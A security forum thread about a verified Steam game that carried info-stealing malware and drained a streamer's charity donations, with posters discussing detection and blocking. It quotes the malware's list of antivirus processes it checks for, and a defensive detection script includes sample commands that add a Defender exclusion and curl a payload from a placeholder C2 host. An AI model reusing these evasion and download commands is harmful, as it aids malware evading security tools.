Verified Steam game steals streamer's cancer treatment donations

Khushal

Thanks for sharing these links, Khushal! This is a nasty case of malware hidden in a seemingly legitimate Steam game. For anyone not caught up, "Blockblasters" was a verified title on Steam that turned out to be laced with info-stealing malware. It targeted streamers, siphoning off cryptocurrency donations meant for things like cancer treatment—super scummy stuff.

From the articles:
- BleepingComputer details how the game used a malicious executable to steal wallet info, browser data, and more.
- GData's blog breaks down the technical side, showing how it evaded detection and downloaded additional payloads.

Quick tips to stay safe on Steam:
  • Stick to well-reviewed games from known developers.
  • Enable Steam Guard and use strong, unique passwords.
  • Run a reputable antivirus (like Malwarebytes or ESET) and scan downloads.
  • If you're a streamer, double-check donation links and use hardware wallets for crypto.

Has anyone else run into shady Steam games lately? Let's discuss how to spot these red flags early.
 
Looks like Bitdefender would have stopped this attack

Source: (The game is no longer available on STEAM)
 
The game was also removed from Steam shortly before this article went online. Interestingly enough, there was at least one live stream where an individual had their system infected in front of a live audience during a fundraiser for cancer treatment, as reported by Twitter user vx-underground.
The heartbreaking reaction of the streamer is a very sobering reminder that malware does real damage to real people and is far more than just some abstract number in some abstract and faraway place.
And it reminds us that the work we do is important.
 
Read about this this morning. It's heartbreaking. Hopefully people can help him recover.

Talking about ways to avoid this, I wonder: would an anti-exe (like CyberLock @danb) or an Application Control (Kaspersky, WDAC, maybe H_C @Andy Ful) have blocked this malware, if it was launching as a child process of steam.exe? Or well, was this the case? Do Steam games launch from this parent process, or are they completely separate processes? Whatever the case, would this kind of security approach block such an attack? :unsure:
 
> Read about this this morning. It's heartbreaking. Hopefully people can help him recover.
>
> Talking about ways to avoid this, I wonder: would an anti-exe (like CyberLock @danb) or an Application Control (Kaspersky, WDAC, maybe H_C @Andy Ful) have blocked this malware, if it was launching as a child process of steam.exe? Or well, was this the case? Do Steam games launch from this parent process, or are they completely separate processes? Whatever the case, would this kind of security approach block such an attack? :unsure:
He probably had only Defender as his line of defence. VirusTotal
The above batch file disables Defender pretty much like the one that GData has covered in their report.
But Microsoft being Microsoft hasn't provided a signature for the above disabler. I have reported the hash and file to them thrice.
If you hop on the Relations tab you will understand how many times the same batch file has been reused by different varieties of malware.

 
> Read about this this morning. It's heartbreaking. Hopefully people can help him recover.
>
> Talking about ways to avoid this, I wonder: would an anti-exe (like CyberLock @danb) or an Application Control (Kaspersky, WDAC, maybe H_C @Andy Ful) have blocked this malware, if it was launching as a child process of steam.exe? Or well, was this the case? Do Steam games launch from this parent process, or are they completely separate processes? Whatever the case, would this kind of security approach block such an attack? :unsure:

The malicious patch uses scripts as an initial attack vector (.bat and .vbs) and the Curl LOLBin for some actions, including connections with the C2 server.
So, any security layer that properly restricts scripts would block the infection. WDAC alone could also mitigate the attack at the later infection stage (.bat not blocked) if Curl is on the BlockList.
 
> He probably had only Defender as his line of defence. VirusTotal

The initial .bat was created to run with most AVs:

set AV_PROCESSES=acronisagent.exe aliedefense.exe almon.exe alyac.exe amitiav.exe arcabitav.exe arcticagent.exe ^
ashavast.exe ashmaisv.exe ashserv.exe aswidsagenta.exe avastmobilesecurity.exe avastsvc.exe avastui.exe avengine.exe ^
avgnt.exe avgui.exe avira.exe avp.exe baidu.exe bdagent.exe bkav.exe bytefence.exe ccsvchst.exe cis.exe ^
clamav.exe clamtray.exe clamwin.exe cmcav.exe cmdagent.exe crowdstrike.exe csagent.exe ctxsvc.exe cynetservice.exe ^
deepinstinct.exe defendercontrol.exe drweb32.exe drwebupw.exe egui.exe eguiproxy.exe emsisoft.exe endpoint.exe ^
esets_gui.exe escan.exe falxagent.exe fortitray.exe fsav32.exe f-scan.exe f-secure.exe fsgk32.exe fsdfwd.exe ^
fssm32.exe gddtray.exe gridinsoft.exe hipsservice.exe hitmanpro.exe huorong.exe ikarus.exe integoav.exe jiangmin.exe ^
k7av.exe kav.exe kavsvc.exe kavtray.exe kaspersky.exe kesgui.exe kingsoftav.exe lionic.exe malwarebytes.exe ^
maxsecureav.exe mbam.exe mbamservice.exe mbamtray.exe mcagent.exe mcshield.exe mcsysmon.exe mctray.exe mcvsshld.exe ^
mfemms.exe mfevtps.exe msascui.exe msmpeng.exe msseces.exe nanoscan.exe nav.exe navapsvc.exe navapw32.exe ^
nortonsecurity.exe npfmessenger.exe npfmsg2.exe outpost.exe panagent.exe panda_cloud_antivirus.exe ^
panda_url_filtering.exe psafe.exe psanhost.exe psuaservice.exe qhactivedefense.exe qhtray.exe qhws.exe rising.exe ^
rtlreminder.exe sangfor.exe sbamsvc.exe secureageav.exe secureaplus.exe sentinelagent.exe skyhigh.exe smc.exe ^
smcgui.exe sophosfs.exe sophoshealth.exe sophosui.exe spiderml.exe spidernt.exe spiderui.exe spyshelter.exe ^
ssmgr.exe superantispyware.exe symantec.exe tachyon.exe tehrisagent.exe tencentdlp.exe threatdownagent.exe ^
tmbmserver.exe tmbmsrv.exe tmlisten.exe tmntsrv.exe tmproxy.exe tmproxy.exe trapmineagent.exe trellixagent.exe ^
ufseagnt.exe varist.exe v3lite.exe v3main.exe v3sp.exe vb32av.exe vipre.exe virit.exe virobot.exe ^
vrfsvc.exe vrpsvc.exe vrpt.exe vsmon.exe vsserv.exe webroot.exe webrootsecureanywhere.exe winpatrol.exe ^
winssnotify.exe withsecure.exe wscntfy.exe wzservice.exe xcitium.exe xcommsvr.exe xvirus.exe yandexav.exe ^
zatray.exe zemana.exe zillya.exe zlclient.exe zonerav.exe zxguard.exe zxtray.exe
 
Yeah, but I don't think it was able to bypass any of them, barring Defender (where it managed to add an exclusion).

Such thinking is risky. More attention for Defender could also suggest that it is considered harder to bypass (more actions required due to Defender's post-infection detections).
However, the attackers could give Defender more attention because of its popularity.
 
> The malicious patch uses scripts as an initial attack vector (.bat and .vbs) and the Curl LOLBin for some actions, including connections with the C2 server.
> So, any security layer that properly restricts scripts would block the infection. WDAC alone could also mitigate the attack at the later infection stage (.bat not blocked) if Curl is on the BlockList.
Is this done with ASR rules on Defender or AppLocker?
 
> Is this done with ASR rules on Defender or AppLocker?

AppLocker will block the initial .bat script.
Some ASR rules have the potential to block the attack, but this should be tested. In Enterprises, the Defender exclusions made by malware can be blocked by Tamper Protection. However, this requires using Intune or Configuration Manager.
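The two points made in this thread, that the initial vector is a .bat/.vbs script and that Curl is the LOLBin used for the C2 connection, plus the Defender exclusion the malware adds, describe a process chain that can be correlated from endpoint telemetry. The Python below is an added example written for this thread; it is not code from the thread, GData's report or the vx-underground forensic report. The events it runs on are constructed in the style of Sysmon process-creation records, and the game folder, script name, payload path and C2 host are placeholders. It assumes Steam's default library layout (`\steamapps\common\`) for the "launched from a game directory" check.

```python
"""Correlate process-creation telemetry into the game-patch infection chain discussed
in this thread: a .bat/.vbs launched from a game directory, a Defender exclusion added
through PowerShell, and curl.exe writing a remote file to disk.

Added example for the thread, not code from the sample or the reports it cites.
SAMPLE_EVENTS is CONSTRUCTED in the style of Sysmon Event ID 1; every path, file name
and host in it is a placeholder."""
import ntpath
import re
from collections import defaultdict

SCRIPT_HOSTS = {"cmd.exe", "wscript.exe", "cscript.exe"}
SCRIPT_EXT_RE = re.compile(r"\.(bat|cmd|vbs|js)\b", re.IGNORECASE)
# Assumption: games are installed under Steam's default library layout.
GAME_DIR_MARKER = "\\steamapps\\common\\"
# Defender tampering via the Add-/Set-MpPreference cmdlets (exclusions or -Disable* switches).
DEFENDER_TAMPER_RE = re.compile(
    r"\b(Add|Set)-MpPreference\b.*?(-Exclusion\w*|-Disable\w+)", re.IGNORECASE)
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
CURL_OUTPUT_RE = re.compile(r"(^|\s)(-o|-O|--output|--remote-name)(\s|$)")

# Constructed sample: pid, parent pid, image path, command line.
SAMPLE_EVENTS = [
    {"pid": 1000, "ppid": 800, "image": "C:\\Program Files (x86)\\Steam\\steam.exe",
     "cmd": "steam.exe"},
    {"pid": 1100, "ppid": 1000,
     "image": "C:\\Program Files (x86)\\Steam\\steamapps\\common\\ExampleGame\\game.exe",
     "cmd": "game.exe"},
    {"pid": 1200, "ppid": 1100, "image": "C:\\Windows\\System32\\cmd.exe",
     "cmd": 'cmd.exe /c "C:\\Program Files (x86)\\Steam\\steamapps\\common\\ExampleGame\\patch.bat"'},
    {"pid": 1300, "ppid": 1200,
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmd": "powershell.exe -Command Add-MpPreference -ExclusionPath "
            "'C:\\Program Files (x86)\\Steam\\steamapps\\common\\ExampleGame'"},
    {"pid": 1400, "ppid": 1200, "image": "C:\\Windows\\System32\\curl.exe",
     "cmd": "curl.exe -s -o C:\\Users\\Public\\stage2.exe http://c2.example.invalid/stage2"},
    # Benign control: an updater calling curl without a script ancestor or an output file.
    {"pid": 2000, "ppid": 800, "image": "C:\\Program Files\\Example\\updater.exe",
     "cmd": "updater.exe"},
    {"pid": 2100, "ppid": 2000, "image": "C:\\Windows\\System32\\curl.exe",
     "cmd": "curl.exe https://updates.example.invalid/manifest.json"},
]


def basename(path):
    """Lower-case file name of a Windows path (ntpath splits on backslashes on any OS)."""
    return ntpath.basename(path).lower()


def classify(event, by_pid):
    """Return the set of chain stages a single event matches on its own."""
    tags = set()
    name = basename(event["image"])
    parent = by_pid.get(event["ppid"])
    # Stage 1: a script host running a .bat/.vbs whose parent lives in a game folder.
    if (name in SCRIPT_HOSTS and SCRIPT_EXT_RE.search(event["cmd"])
            and parent is not None and GAME_DIR_MARKER in parent["image"].lower()):
        tags.add("script_from_game_dir")
    # Stage 2: PowerShell adding a Defender exclusion or switching a feature off.
    if name in {"powershell.exe", "pwsh.exe"} and DEFENDER_TAMPER_RE.search(event["cmd"]):
        tags.add("defender_exclusion")
    # Stage 3: the curl LOLBin fetching a URL and writing it to disk.
    if (name == "curl.exe" and URL_RE.search(event["cmd"])
            and CURL_OUTPUT_RE.search(event["cmd"])):
        tags.add("curl_download")
    return tags


def correlate(events):
    """Group events under their nearest stage-1 ancestor; report chains that progressed."""
    by_pid = {e["pid"]: e for e in events}
    tags_by_pid = {e["pid"]: classify(e, by_pid) for e in events}
    chains = defaultdict(lambda: {"root_pid": None, "stages": set(), "pids": set()})
    for event in events:
        cur = event
        # Walk up the process tree until a flagged script host is found (or the tree ends).
        while cur is not None and "script_from_game_dir" not in tags_by_pid[cur["pid"]]:
            cur = by_pid.get(cur["ppid"])
        if cur is None:
            continue  # no suspicious script ancestor: not part of any chain
        chain = chains[cur["pid"]]
        chain["root_pid"] = cur["pid"]
        chain["stages"] |= tags_by_pid[event["pid"]]
        chain["pids"].add(event["pid"])
    # A lone script launch is noise; a script followed by tampering or a download is not.
    return [c for c in chains.values() if len(c["stages"]) > 1]


def describe(chain):
    """One-line summary suitable for an alert title."""
    later = sorted(chain["stages"] - {"script_from_game_dir"})
    return f"pid {chain['root_pid']}: script launched from game dir -> {', '.join(later)}"


if __name__ == "__main__":
    for chain in correlate(SAMPLE_EVENTS):
        print(describe(chain))
```

The benign `curl.exe` call from the updater is deliberately left unflagged: it has no script-host ancestor and writes nothing to disk, which is the distinction the correlation relies on. Feeding real Sysmon or EDR process events into `correlate` only requires mapping their fields onto `pid`, `ppid`, `image` and `cmd`.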
 
For people who want more info or play around with the sample:

https:// vx-underground . org/Malware%20Analysis/2025/2025-09-21%20-%20Block%20Blasters%20-%20Forensic%20Report
 
User type: Initiator
Application name: firefox.exe
Application path: C:\Program Files\Mozilla Firefox
Component: Web Threat Protection
Result description: Blocked
Type: Malicious link
Name: vx-underground.org
Precision: Exactly
Threat level: High
Object type: Web page
Object name: vx-underground.org
Reason: Automatic analysis
Databases release date: Today, 23/09/2025 14:11:00
🤔
 
They provide analysis results of malware dating back to 2006 or something and also share the malicious samples in an encrypted archive. That's probably the reason why the site is flagged. But nothing to worry about considering the site itself. (y)
AVG did not flag this website.
 
> AVG did not flag this website.

As I said, there is not really a reason for it. You can also download samples from Any.Run and it isn't considered malicious. The site is safe and it only shares the malicious samples of the analysis report if one wants to download them.

Password for the archives is "infected"
 